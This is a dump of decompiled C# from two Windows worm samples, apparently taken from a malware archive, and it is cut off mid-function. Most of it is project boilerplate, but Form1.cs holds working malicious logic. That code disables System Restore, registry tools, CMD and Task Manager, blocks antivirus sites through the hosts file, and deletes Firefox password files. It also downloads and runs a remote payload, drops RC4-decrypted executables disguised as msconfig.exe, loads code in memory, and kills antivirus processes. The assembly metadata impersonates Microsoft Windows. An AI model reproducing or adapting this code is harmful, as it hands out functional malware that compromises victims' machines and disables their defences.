MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/MySettingsProperty.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.MySettingsProperty
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace DasVirus.My
{
[StandardModule]
[DebuggerNonUserCode]
[HideModuleName]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.Resources.Resources
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace DasVirus.My.Resources
{
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[HideModuleName]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) DasVirus.My.Resources.Resources.resourceMan, (object) null))
DasVirus.My.Resources.Resources.resourceMan = new ResourceManager("DasVirus.Resources", typeof (DasVirus.My.Resources.Resources).Assembly);
return DasVirus.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => DasVirus.My.Resources.Resources.resourceCulture;
set => DasVirus.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Worm.Win32.AutoRun.dfi.csproj
+56
View File
@@ -0,0 +1,56 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>DasVirus</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>DasVirus</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\InternalXmlHelper.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Worm.Win32.AutoRun.dfi.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DasVirus", "Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.csproj", "{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}.Debug|Any CPU.Build.0 = Debug|Any CPU
{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}.Release|Any CPU.ActiveCfg = Release|Any CPU
{71C7D63E-1FC2-4ADB-B72B-19B8DA3A7228}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Antis.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.Antis
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using System.Diagnostics;
namespace BCV5StuB
{
public class Antis
{
[DebuggerNonUserCode]
public Antis()
{
}
public static void Enable()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("Windows Operating System Configuration")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © Microsoft 2010")]
[assembly: AssemblyCompany("Windows")]
[assembly: AssemblyTitle("Windows")]
[assembly: AssemblyProduct("Windows Ultimate Edition licence")]
[assembly: AssemblyFileVersion("11.12.13.14")]
[assembly: Guid("21054aa6-510d-4a17-b3c7-e2547d334245")]
[assembly: AssemblyVersion("7.8.9.10")]
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Form1.cs
+832
View File
@@ -0,0 +1,832 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.Form1
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using BCV5StuB.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace BCV5StuB
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("WebBrowser1")]
private WebBrowser _WebBrowser1;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("CheckBox1")]
private CheckBox _CheckBox1;
private string TPath;
private string filetoinject;
private const string FileFucker = "Blackout";
private string filetodo;
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.TPath = Path.GetTempPath();
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.Label1 = new Label();
this.WebBrowser1 = new WebBrowser();
this.Button1 = new Button();
this.CheckBox1 = new CheckBox();
this.SuspendLayout();
this.Label1.AutoSize = true;
Label label1_1 = this.Label1;
Point point1 = new Point(102, 62);
Point point2 = point1;
label1_1.Location = point2;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
Size size1 = new Size(39, 13);
Size size2 = size1;
label1_2.Size = size2;
this.Label1.TabIndex = 0;
this.Label1.Text = "Label1";
WebBrowser webBrowser1_1 = this.WebBrowser1;
point1 = new Point(169, 62);
Point point3 = point1;
webBrowser1_1.Location = point3;
WebBrowser webBrowser1_2 = this.WebBrowser1;
size1 = new Size(20, 20);
Size size3 = size1;
webBrowser1_2.MinimumSize = size3;
this.WebBrowser1.Name = "WebBrowser1";
WebBrowser webBrowser1_3 = this.WebBrowser1;
size1 = new Size(176, 162);
Size size4 = size1;
webBrowser1_3.Size = size4;
this.WebBrowser1.TabIndex = 1;
Button button1_1 = this.Button1;
point1 = new Point(199, 13);
Point point4 = point1;
button1_1.Location = point4;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(75, 23);
Size size5 = size1;
button1_2.Size = size5;
this.Button1.TabIndex = 2;
this.Button1.Text = "Button1";
this.Button1.UseVisualStyleBackColor = true;
this.CheckBox1.AutoSize = true;
CheckBox checkBox1_1 = this.CheckBox1;
point1 = new Point(49, 139);
Point point5 = point1;
checkBox1_1.Location = point5;
this.CheckBox1.Name = "CheckBox1";
CheckBox checkBox1_2 = this.CheckBox1;
size1 = new Size(81, 17);
Size size6 = size1;
checkBox1_2.Size = size6;
this.CheckBox1.TabIndex = 3;
this.CheckBox1.Text = "CheckBox1";
this.CheckBox1.UseVisualStyleBackColor = true;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(409, 248);
this.ClientSize = size1;
this.Controls.Add((Control) this.CheckBox1);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.WebBrowser1);
this.Controls.Add((Control) this.Label1);
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this._Label1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual WebBrowser WebBrowser1
{
[DebuggerNonUserCode] get => this._WebBrowser1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._WebBrowser1 = value;
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
}
internal virtual CheckBox CheckBox1
{
[DebuggerNonUserCode] get => this._CheckBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
}
private void Form1_Load(object sender, EventArgs e)
{
this.Visible = false;
this.ShowInTaskbar = false;
bool flag = Form1.is64Bit();
string[] strArray = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "Blackout");
string str1 = strArray[7];
string str2 = strArray[8];
string str3 = strArray[9];
string str4 = strArray[10];
string address = strArray[11];
string str5 = strArray[12];
string str6 = strArray[13];
string str7 = strArray[14];
string str8 = strArray[15];
string str9 = strArray[16];
if (Conversions.ToBoolean(strArray[17]))
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", (object) "1", RegistryValueKind.DWord);
if (Conversions.ToBoolean(str9))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
if (Conversions.ToBoolean(str8))
{
StreamWriter streamWriter = new StreamWriter("C:\\Windows\\System32\\drivers\\etc\\hosts", true);
string str10 = "\n 127.0.0.1 www.virustotal.com";
string str11 = "\n 127.0.0.1 www.bitdefender.com";
string str12 = "\n 127.0.0.1 www.virusscan.jotti.org";
string str13 = "\n 127.0.0.1 www.scanner.novirusthanks.org";
streamWriter.Write(str10);
streamWriter.Write("\r\n" + str11);
streamWriter.Write("\r\n" + str12);
streamWriter.Write("\r\n" + str13);
streamWriter.Close();
}
if (Conversions.ToBoolean(str7))
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
if (Conversions.ToBoolean(str6))
{
string str14 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (Directory.Exists(str14))
{
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str14))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
if (Conversions.ToBoolean(str5))
{
try
{
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
if (Conversions.ToBoolean(str1))
usb.usb_sp();
if (MyProject.Computer.FileSystem.FileExists(this.TPath + "123.exe"))
MyProject.Computer.FileSystem.DeleteFile(this.TPath + "123.exe");
if (Conversions.ToBoolean(str4))
{
MyProject.Computer.Network.DownloadFile(address, this.TPath + "123.exe");
Process.Start(this.TPath + "123.exe");
}
if (Conversions.ToBoolean(str2))
rc4.Startup();
if (Conversions.ToBoolean(str3))
{
Form1.mofo();
Form1.AntiAntiGen();
Form1.AntiAsquared();
Form1.AntiAvast();
Form1.AntiAVG();
Form1.AntiBullGuard();
Form1.AntiClamAV();
Form1.AntiComodo();
Form1.AntiEstNod32();
Form1.AntiEwido();
Form1.AntiFPROT6();
Form1.AntiKaspersky();
Form1.AntiMcAfee();
Form1.AntiNorton();
Form1.AntiOfficeScan();
Form1.AntiOutPost();
Form1.AntiPCCillin();
Form1.AntiServerProtect();
Form1.AntiSpySweeper();
Form1.AntiThreatExpert();
Form1.AntiVirtualPC();
Form1.AntiZoneAlarm();
}
if (Conversions.ToBoolean(strArray[5]))
{
this.filetodo = rc4.rc4(strArray[6], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig_settings.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetodo, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig_settings.exe");
}
if (Conversions.ToBoolean(strArray[2]))
{
int num = (int) Interaction.MsgBox((object) strArray[1]);
}
if (flag)
{
try
{
if (this.ScanForDotNet())
{
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
}
else
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
Encoding.Default.GetBytes(this.filetoinject);
if (this.ScanForDotNet())
{
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
try
{
new RunPE().SRexec(Encoding.Default.GetBytes(this.filetoinject), Process.GetCurrentProcess().MainModule.FileName);
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
try
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
}
}
}
public static bool is64Bit() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0;
public static void AntiSandboxie(Form frmSelect)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
if (!frmSelect.Text.Contains("#"))
goto label_9;
label_2:
num3 = 3;
frmSelect.Close();
ProjectData.EndApp();
goto label_9;
label_4:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 5:
case 6:
goto label_9;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_4;
}
throw ProjectData.CreateProjectError(-2146828237);
label_9:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static void AntiMcAfee()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAVG()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAsquared()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
private void RunFromMemory(byte[] bytes)
{
Assembly assembly = Assembly.Load(bytes);
MethodInfo entryPoint = assembly.EntryPoint;
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
{
(object) new string[1]{ "1" }
});
}
public void runit(string split)
{
byte[] bytes = Encoding.GetEncoding(1252).GetBytes(split);
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.RunFromMemory((byte[]) a0)));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) bytes);
this.Close();
}
private bool ScanForDotNet()
{
if (!this.filetoinject.Contains("</assembly>"))
return false;
bool flag;
return Operators.CompareString(Strings.Split(this.filetoinject, "</assembly>")[1].ToLower(), "", false) != 0 || flag;
}
public static void AntiAvast()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiClamAV()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiComodo()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiEwido()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiFPROT6()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiKaspersky()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiBullGuard()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiZoneAlarm()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiAntiGen()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiNorton()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiOfficeScan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiPCCillin()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiServerProtect()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void AntiSpySweeper()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0)
